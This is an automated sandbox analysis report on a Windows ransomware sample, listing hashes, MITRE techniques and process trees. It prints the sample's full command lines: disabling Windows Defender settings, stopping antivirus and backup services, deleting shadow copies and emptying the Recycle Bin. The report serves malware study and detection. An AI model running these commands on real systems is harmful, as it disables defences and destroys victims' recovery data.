1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
7s
max time network
150s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Size

89KB
MD5

c0d3aae8bda692a1a97b54d9db53be65
SHA1

dba09fa80ad5a64780777827ba27c3bc8443009c
SHA256

551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c
SHA512

adb56650b539694f8f0976e1ed1cc46f98360062ff0edbd79b413a29efcb20176b37af67f1b50f2359cde3f2cd2ce9f1f242f1b4ad5c327bb9d5819d86584066

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 9 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

6528 icacls.exe
4716 icacls.exe
3040 icacls.exe
2388 icacls.exe
6680 icacls.exe
6600 icacls.exe
812 icacls.exe
5968 icacls.exe
6428 icacls.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
6528	icacls.exe
4716	icacls.exe
3040	icacls.exe
2388	icacls.exe
6680	icacls.exe
6600	icacls.exe
812	icacls.exe
5968	icacls.exe
6428	icacls.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
6224	vssadmin.exe
6216	vssadmin.exe
6172	vssadmin.exe
6088	vssadmin.exe
6232	vssadmin.exe
6200	vssadmin.exe
6180	vssadmin.exe
6164	vssadmin.exe
6248	vssadmin.exe
5480	vssadmin.exe
6208	vssadmin.exe
6192	vssadmin.exe
6152	vssadmin.exe
6240	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
6536	taskkill.exe
260	taskkill.exe
5608	taskkill.exe
5524	taskkill.exe
4820	taskkill.exe
5544	taskkill.exe
6752	taskkill.exe
6968	taskkill.exe
1288	taskkill.exe
6796	taskkill.exe
7056	taskkill.exe
6804	taskkill.exe
4648	taskkill.exe
3964	taskkill.exe
5332	taskkill.exe
4972	taskkill.exe
5856	taskkill.exe
5376	taskkill.exe
6060	taskkill.exe
4428	taskkill.exe
7164	taskkill.exe
6976	taskkill.exe
7116	taskkill.exe
6464	taskkill.exe
6832	taskkill.exe
924	taskkill.exe
4808	taskkill.exe
6032	taskkill.exe
7136	taskkill.exe
4856	taskkill.exe
6784	taskkill.exe
6184	taskkill.exe
6124	taskkill.exe
5396	taskkill.exe
6496	taskkill.exe
4848	taskkill.exe
4644	taskkill.exe
2544	taskkill.exe
6884	taskkill.exe
4532	taskkill.exe
6924	taskkill.exe
3312	taskkill.exe
5144	taskkill.exe
6816	taskkill.exe
6940	taskkill.exe
1176	taskkill.exe
4304	taskkill.exe
6644	taskkill.exe
184	taskkill.exe
6084	taskkill.exe
5888	taskkill.exe
6184	taskkill.exe
2208	taskkill.exe
5636	taskkill.exe
1832	taskkill.exe
4552	taskkill.exe
4492	taskkill.exe
6084	taskkill.exe
5508	taskkill.exe
6064	taskkill.exe
7144	taskkill.exe
6276	taskkill.exe
5312	taskkill.exe
3824	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

6400 reg.exe
5268 reg.exe
6348 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

6176 PING.EXE

pid	process
6400	reg.exe
5268	reg.exe
6348	reg.exe

pid	process
6176	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exepowershell.exe

pid	process
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
836	powershell.exe
836	powershell.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
836	powershell.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenet1.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeIncreaseQuotaPrivilege	836	powershell.exe
Token: SeSecurityPrivilege	836	powershell.exe
Token: SeTakeOwnershipPrivilege	836	powershell.exe
Token: SeLoadDriverPrivilege	836	powershell.exe
Token: SeSystemProfilePrivilege	836	powershell.exe
Token: SeSystemtimePrivilege	836	powershell.exe
Token: SeProfSingleProcessPrivilege	836	powershell.exe
Token: SeIncBasePriorityPrivilege	836	powershell.exe
Token: SeCreatePagefilePrivilege	836	powershell.exe
Token: SeBackupPrivilege	836	powershell.exe
Token: SeRestorePrivilege	836	powershell.exe
Token: SeShutdownPrivilege	836	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeSystemEnvironmentPrivilege	836	powershell.exe
Token: SeRemoteShutdownPrivilege	836	powershell.exe
Token: SeUndockPrivilege	836	powershell.exe
Token: SeManageVolumePrivilege	836	powershell.exe
Token: 33	836	powershell.exe
Token: 34	836	powershell.exe
Token: 35	836	powershell.exe
Token: 36	836	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	3840
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	2504	net1.exe
Token: SeDebugPrivilege	4164
Token: SeDebugPrivilege	4304	taskkill.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe

description	pid	process	target process
PID 3904 wrote to memory of 836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 2836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 2836	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 3912	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 3912	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 2352	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 2352	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 3756	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 3756	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 3840	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 3840	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 924	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 924	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 2504	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 2504	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 4164	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 4164	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 4304	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	net.exe
PID 3904 wrote to memory of 4304	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	net.exe
PID 3904 wrote to memory of 4444	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 4444	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	powershell.exe
PID 3904 wrote to memory of 4552	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	Conhost.exe
PID 3904 wrote to memory of 4552	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	Conhost.exe
PID 3904 wrote to memory of 4656	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	Conhost.exe
PID 3904 wrote to memory of 4656	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	Conhost.exe
PID 3904 wrote to memory of 4700	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	net.exe
PID 3904 wrote to memory of 4700	3904	551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:3840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:2504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  PID:4164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4656
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:5216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:5060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5944
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:6112
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5428
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6548
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:4916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:6256
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6248
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6240
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6232
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6224
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6216
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6208
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6200
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6192
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6180
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6172
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6164
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6152
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:6184
